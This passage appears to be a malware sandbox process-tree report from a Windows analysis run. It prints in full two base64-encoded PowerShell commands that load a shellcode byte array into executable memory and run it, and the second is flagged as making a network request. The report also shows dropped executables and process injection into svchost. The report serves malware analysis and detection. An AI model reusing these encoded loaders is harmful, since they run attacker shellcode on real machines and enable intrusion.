      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABhAE8AcgBjACAAPQAgACcAJABOAEUAQwBFACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE4ARQBDAEUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4AGUAZAAsADAAeAAzAGEALAAwAHgAMgBmACwAMAB4ADAAZAAsADAAeABkAGEALAAwAHgAZAA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1AGUALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4AGMAZAAsADAAeABmADgALAAwAHgAYgA3ACwAMAB4AGEAMQAsADAAeAA5AGUALAAwAHgAMAAzACwAMAB4ADQANwAsADAAeAAzADIALAAwAHgAYwAxACwAMAB4ADgAYQAsADAAeABhADIALAAwAHgAMAAzACwAMAB4AGQAMwAsADAAeABlADkALAAwAHgAYQA3ACwAMAB4ADMANgAsADAAeABlADMALAAwAHgANwBhACwAMAB4AGUANQAsADAAeABiAGEALAAwAHgAOAA4ACwAMAB4ADIAZgAsADAAeAAxAGQALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeABjADAALAAwAHgAYQBhACwAMAB4AGIAZQAsADAAeABhAGIALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAAxADYALAAwAHgAOAA1ACwAMAB4AGEAYQAsADAAeABlAGEALAAwAHgANQBiACwAMAB4ADgANAAsADAAeAA1ADYALAAwAHgAZgAwACwAMAB4ADgAZgAsADAAeAA2ADYALAAwAHgANgA2ACwAMAB4ADMAYgAsADAAeABjADIALAAwAHgANgA3ACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAYQA4ACwAMAB4ADgAOAAsADAAeAA3AGQALAAwAHgAOAA3ACwAMAB4ADAAMQAsADAAeAA0ADcALAAwAHgAZAA1ACwAMAB4ADEAYwAsADAAeABlADcALAAwAHgANQBiACwAMAB4AGQAOAAsADAAeABmADIALAAwAHgANgAzACwAMAB4AGUAMwAsADAAeABhADIALAAwAHgANwA3ACwAMAB4AGIAMwAsADAAeAA5ADAALAAwAHgAMQBlACwAMAB4ADcANgAsADAAeABlADQALAAwAHgAZAAyACwAMAB4AGMANwAsADAAeAA1ADgALAAwAHgANQA0ACwAMAB4AGUANAAsADAAeAAyADQALAAwAHgAMQAzACwAMAB4ADEAYwAsADAAeABmAGUALAAwAHgANABmACwAMAB4AGUAYQAsADAAeABlADkALAAwAHgAYwAyACwAMAB4ADcAZQAsADAAeAAxADMALAAwAHgANQA4ACwAMAB4AGIAMAAsADAAeABiADUALAAwAHgANgAwACwAMAB4ADUAYQAsADAAeAAxADAALAAwAHgAOAA0ACwAMAB4AGIANgAsADAAeABmADEALAAwAHgANQBkACwAMAB4ADIAOAAsADAAeAAzAGIALAAwAHgAMABiACwAMAB4ADkAOQAsADAAeAA4AGYALAAwAHgAYQAzACwAMAB4ADcAZQAsADAAeABkADEALAAwAHgAZgAzACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMgAyACwAMAB4ADgAOQAsADAAeAA4ADQALAAwAHgAMABjACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgANABmACwAMAB4AGIANgAsADAAeAAxADEALAAwAHgAYwBiACwAMAB4ADkAYwAsADAAeAAyADEALAAwAHgAZAAxACwAMAB4AGMANwAsADAAeAA2ADkALAAwAHgAMgA1ACwAMAB4AGIAZAAsADAAeABjAGIALAAwAHgANgBjACwAMAB4AGUAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGUANQAsADAAeAAwAGQALAAwAHgAMQBhACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAMgA5ACwAMAB4AGIAZQAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUAMwAsADAAeABlADcALAAwAHgAOAA3ACwAMAB4AGMAOQAsADAAeAA2AGMALAAwAHgAZgA3ACwAMAB4ADYAMAAsADAAeABiADYALAAwAHgAYwA4ACwAMAB4ADcAMwAsADAAeAA4ADIALAAwAHgAYQAxACwAMAB4ADYAZAAsADAAeAA3AGMALAAwAHgANQBjACwAMAB4AGMAZQAsADAAeAAzADMALAAwAHgAZQBiACwAMAB4ADkAMAAsADAAeAAwADIALAAwAHgAYwBjACwAMAB4AGUAYgAsADAAeABiAGUALAAwAHgAMQA1ACwAMAB4AGIAZgAsADAAeABkADkALAAwAHgANgAxACwAMAB4ADgAZAAsADAAeAA1ADcALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwAGIALAAwAHgAYQBmACwAMAB4AGUAMwAsADAAeABmAGQALAAwAHgAYQBjACwAMAB4ADcAZgAsADAAeAA0AGIALAAwAHgANgBkACwAMAB4ADUAMwAsADAAeAA4ADAALAAwAHgAYQBjACwAMAB4AGEANwAsADAAeAA5ADcALAAwAHgAZAA0ACwAMAB4AGYAYwAsADAAeABkAGYALAAwAHgAMwBlACwAMAB4ADUANQAsADAAeAA5ADcALAAwAHgAMQBmACwAMAB4AGIAZgAsADAAeAA4ADAALAAwAHgAMAAyACwAMAB4ADIAYQAsADAAeAA1ADcALAAwAHgANgA0ACwAMAB4ADUAYQAsADAAeABlADUALAAwAHgAMQA0ACwAMAB4ADEAMgAsADAAeAA1AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeAA1ADgALAAwAHgAZAA3ACwAMAB4ADEAYwAsADAAeAAwAGIALAAwAHgAYwBlACwAMAB4AGIAOAAsADAAeABiADAALAAwAHgAZQBiACwAMAB4AGIAZQAsADAAeAA3ADgALAAwAHgANgAxACwAMAB4ADgAMwAsADAAeABkADQALAAwAHgANwA2ACwAMAB4ADUAZQAsADAAeABiADMALAAwAHgAZAA2ACwAMAB4ADUAYwAsADAAeABmADcALAAwAHgANQA5ACwAMAB4ADMAOQAsADAAeAAwADkALAAwAHgAYQBmACwAMAB4AGYANQAsADAAeABhADAALAAwAHgAMQAwACwAMAB4ADMAYgAsADAAeAA2ADQALAAwAHgAMgBjACwAMAB4ADgAZgAsADAAeAA0ADEALAAwAHgAYQA2ACwAMAB4AGEANgAsADAAeAAzAGMALAAwAHgAYgA1ACwAMAB4ADYAOAAsADAAeAA0AGYALAAwAHgANAA4ACwAMAB4AGEANQAsADAAeAAxAGMALAAwAHgAYgBmACwAMAB4ADAANwAsADAAeAA5ADcALAAwAHgAOABhACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgAYgAyACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgAMwBhACwAMAB4ADEANQAsADAAeAA2ADUALAAwAHgAYwAxACwAMAB4ADQAMAAsADAAeAA0ADAALAAwAHgANAAxACwAMAB4ADQAZQAsADAAeABiAGEALAAwAHgAYQA3ACwAMAB4AGQAYQAsADAAeAA0ADcALAAwAHgAMgBlACwAMAB4ADAAOAAsADAAeABiADQALAAwAHgAYQA3ACwAMAB4AGIAZQAsADAAeAA4ADgALAAwAHgANAA0ACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADIAYwAsADAAeABhADYALAAwAHgAOABjACwAMAB4AGQAYQAsADAAeAA0ADkALAAwAHgAYQA5ACwAMAB4ADEAOAAsADAAeAA0AGYALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAMgA2ACwAMAB4AGIANwAsADAAeAA5ADcALAAwAHgAYwBiACwAMAB4AGMANAAsADAAeABlAGUALAAwAHgAZAAwACwAMAB4ADUAMwAsADAAeAAzADYALAAwAHgAYwA1ACwAMAB4AGUAMAAsADAAeABhADgALAAwAHgAZQAxACwAMAB4ADIAMwAsADAAeAA5ADcALAAwAHgAYwAwACwAMAB4ADMAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAYgBXAGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGIAVwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABiAFcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGEATwByAGMAKQApADsAJABtAFYAbAAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAHgAdgBxACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAeAB2AHEAIAAkAG0AVgBsACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAG0AVgBsACAAJABlACIAOwB9AA==
      4⤵
      PID:480
    - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABOAEUAQwBFACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATgBFAEMARQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGIALAAwAHgAZQBkACwAMAB4ADMAYQAsADAAeAAyAGYALAAwAHgAMABkACwAMAB4AGQAYQAsADAAeABkADgALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAZQAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgAYwBkACwAMAB4AGYAOAAsADAAeABiADcALAAwAHgAYQAxACwAMAB4ADkAZQAsADAAeAAwADMALAAwAHgANAA3ACwAMAB4ADMAMgAsADAAeABjADEALAAwAHgAOABhACwAMAB4AGEAMgAsADAAeAAwADMALAAwAHgAZAAzACwAMAB4AGUAOQAsADAAeABhADcALAAwAHgAMwA2ACwAMAB4AGUAMwAsADAAeAA3AGEALAAwAHgAZQA1ACwAMAB4AGIAYQAsADAAeAA4ADgALAAwAHgAMgBmACwAMAB4ADEAZAAsADAAeABmADIALAAwAHgANwAxACwAMAB4AGMAMAAsADAAeABhAGEALAAwAHgAYgBlACwAMAB4AGEAYgAsADAAeAA1ADQALAAwAHgAYQA2ACwAMAB4ADEANgAsADAAeAA4ADUALAAwAHgAYQBhACwAMAB4AGUAYQAsADAAeAA1AGIALAAwAHgAOAA0ACwAMAB4ADUANgAsADAAeABmADAALAAwAHgAOABmACwAMAB4ADYANgAsADAAeAA2ADYALAAwAHgAMwBiACwAMAB4AGMAMgAsADAAeAA2ADcALAAwAHgAYQBmACwAMAB4ADgAYQAsADAAeABhADgALAAwAHgAOAA4ACwAMAB4ADcAZAAsADAAeAA4ADcALAAwAHgAMAAxACwAMAB4ADQANwAsADAAeABkADUALAAwAHgAMQBjACwAMAB4AGUANwAsADAAeAA1AGIALAAwAHgAZAA4ACwAMAB4AGYAMgAsADAAeAA2ADMALAAwAHgAZQAzACwAMAB4AGEAMgAsADAAeAA3ADcALAAwAHgAYgAzACwAMAB4ADkAMAAsADAAeAAxAGUALAAwAHgANwA2ACwAMAB4AGUANAAsADAAeABkADIALAAwAHgAYwA3ACwAMAB4ADUAOAAsADAAeAA1ADQALAAwAHgAZQA0ACwAMAB4ADIANAAsADAAeAAxADMALAAwAHgAMQBjACwAMAB4AGYAZQAsADAAeAA0AGYALAAwAHgAZQBhACwAMAB4AGUAOQAsADAAeABjADIALAAwAHgANwBlACwAMAB4ADEAMwAsADAAeAA1ADgALAAwAHgAYgAwACwAMAB4AGIANQAsADAAeAA2ADAALAAwAHgANQBhACwAMAB4ADEAMAAsADAAeAA4ADQALAAwAHgAYgA2ACwAMAB4AGYAMQAsADAAeAA1AGQALAAwAHgAMgA4ACwAMAB4ADMAYgAsADAAeAAwAGIALAAwAHgAOQA5ACwAMAB4ADgAZgAsADAAeABhADMALAAwAHgANwBlACwAMAB4AGQAMQAsADAAeABmADMALAAwAHgANQBlACwAMAB4ADcAOQAsADAAeAAyADIALAAwAHgAOAA5ACwAMAB4ADgANAAsADAAeAAwAGMALAAwAHgAYgA1ACwAMAB4ADIAOQAsADAAeAA0AGYALAAwAHgAYgA2ACwAMAB4ADEAMQAsADAAeABjAGIALAAwAHgAOQBjACwAMAB4ADIAMQAsADAAeABkADEALAAwAHgAYwA3ACwAMAB4ADYAOQAsADAAeAAyADUALAAwAHgAYgBkACwAMAB4AGMAYgAsADAAeAA2AGMALAAwAHgAZQBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAZQA1ACwAMAB4ADAAZAAsADAAeAAxAGEALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeAAyADkALAAwAHgAYgBlACwAMAB4AGQAOQAsADAAeAA2ADYALAAwAHgANQAzACwAMAB4AGUANwAsADAAeAA4ADcALAAwAHgAYwA5ACwAMAB4ADYAYwAsADAAeABmADcALAAwAHgANgAwACwAMAB4AGIANgAsADAAeABjADgALAAwAHgANwAzACwAMAB4ADgAMgAsADAAeABhADEALAAwAHgANgBkACwAMAB4ADcAYwAsADAAeAA1AGMALAAwAHgAYwBlACwAMAB4ADMAMwAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADAAMgAsADAAeABjAGMALAAwAHgAZQBiACwAMAB4AGIAZQAsADAAeAAxADUALAAwAHgAYgBmACwAMAB4AGQAOQAsADAAeAA2ADEALAAwAHgAOABkACwAMAB4ADUANwAsADAAeAA1ADIALAAwAHgAZQA5ACwAMAB4ADAAYgAsADAAeABhAGYALAAwAHgAZQAzACwAMAB4AGYAZAAsADAAeABhAGMALAAwAHgANwBmACwAMAB4ADQAYgAsADAAeAA2AGQALAAwAHgANQAzACwAMAB4ADgAMAAsADAAeABhAGMALAAwAHgAYQA3ACwAMAB4ADkANwAsADAAeABkADQALAAwAHgAZgBjACwAMAB4AGQAZgAsADAAeAAzAGUALAAwAHgANQA1ACwAMAB4ADkANwAsADAAeAAxAGYALAAwAHgAYgBmACwAMAB4ADgAMAAsADAAeAAwADIALAAwAHgAMgBhACwAMAB4ADUANwAsADAAeAA2ADQALAAwAHgANQBhACwAMAB4AGUANQAsADAAeAAxADQALAAwAHgAMQAyACwAMAB4ADUAZQAsADAAeABmAGEALAAwAHgANQBiACwAMAB4ADUAOAAsADAAeABkADcALAAwAHgAMQBjACwAMAB4ADAAYgAsADAAeABjAGUALAAwAHgAYgA4ACwAMAB4AGIAMAAsADAAeABlAGIALAAwAHgAYgBlACwAMAB4ADcAOAAsADAAeAA2ADEALAAwAHgAOAAzACwAMAB4AGQANAAsADAAeAA3ADYALAAwAHgANQBlACwAMAB4AGIAMwAsADAAeABkADYALAAwAHgANQBjACwAMAB4AGYANwAsADAAeAA1ADkALAAwAHgAMwA5ACwAMAB4ADAAOQAsADAAeABhAGYALAAwAHgAZgA1ACwAMAB4AGEAMAAsADAAeAAxADAALAAwAHgAMwBiACwAMAB4ADYANAAsADAAeAAyAGMALAAwAHgAOABmACwAMAB4ADQAMQAsADAAeABhADYALAAwAHgAYQA2ACwAMAB4ADMAYwAsADAAeABiADUALAAwAHgANgA4ACwAMAB4ADQAZgAsADAAeAA0ADgALAAwAHgAYQA1ACwAMAB4ADEAYwAsADAAeABiAGYALAAwAHgAMAA3ACwAMAB4ADkANwAsADAAeAA4AGEALAAwAHgAYwAwACwAMAB4AGIAZAAsADAAeABiADIALAAwAHgAMwAyACwAMAB4ADUANQAsADAAeAAzAGEALAAwAHgAMQA1ACwAMAB4ADYANQAsADAAeABjADEALAAwAHgANAAwACwAMAB4ADQAMAAsADAAeAA0ADEALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABhADcALAAwAHgAZABhACwAMAB4ADQANwAsADAAeAAyAGUALAAwAHgAMAA4ACwAMAB4AGIANAAsADAAeABhADcALAAwAHgAYgBlACwAMAB4ADgAOAAsADAAeAA0ADQALAAwAHgAZgBlACwAMAB4AGQANAAsADAAeAA4ADgALAAwAHgAMgBjACwAMAB4AGEANgAsADAAeAA4AGMALAAwAHgAZABhACwAMAB4ADQAOQAsADAAeABhADkALAAwAHgAMQA4ACwAMAB4ADQAZgAsADAAeABjADIALAAwAHgAMwBjACwAMAB4AGEAMwAsADAAeAAyADYALAAwAHgAYgA3ACwAMAB4ADkANwAsADAAeABjAGIALAAwAHgAYwA0ACwAMAB4AGUAZQAsADAAeABkADAALAAwAHgANQAzACwAMAB4ADMANgAsADAAeABjADUALAAwAHgAZQAwACwAMAB4AGEAOAAsADAAeABlADEALAAwAHgAMgAzACwAMAB4ADkANwAsADAAeABjADAALAAwAHgAMwAxADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABiAFcAaAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAYgBXAGgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGIAVwBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
        5⤵
        Blocklisted process makes network request
        
        PID:4448
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c01hzasu\c01hzasu.cmdline"
        6⤵
        
        PID:1012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFB3.tmp" "c:\Users\Admin\AppData\Local\Temp\c01hzasu\CSC7F971826576A4179B66F33E48B95593E.TMP"
        7⤵
        
        PID:3272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6068 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6108 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6040 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4700
- C:\Users\Admin\Downloads\YzlhMGI2 (1).exe
  "C:\Users\Admin\Downloads\YzlhMGI2 (1).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3184
- - C:\Windows\SysWOW64\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs
    3⤵
    - Suspicious use of SetThreadContext
    PID:4360
  - - C:\Windows\SysWOW64\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs
      4⤵
      PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5788 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5592 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6132 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5828 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6020 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:872
- C:\Users\Admin\Downloads\Y2Q0MzM1 (2).exe
  "C:\Users\Admin\Downloads\Y2Q0MzM1 (2).exe"
  2⤵
  - Executes dropped EXE
  PID:3980
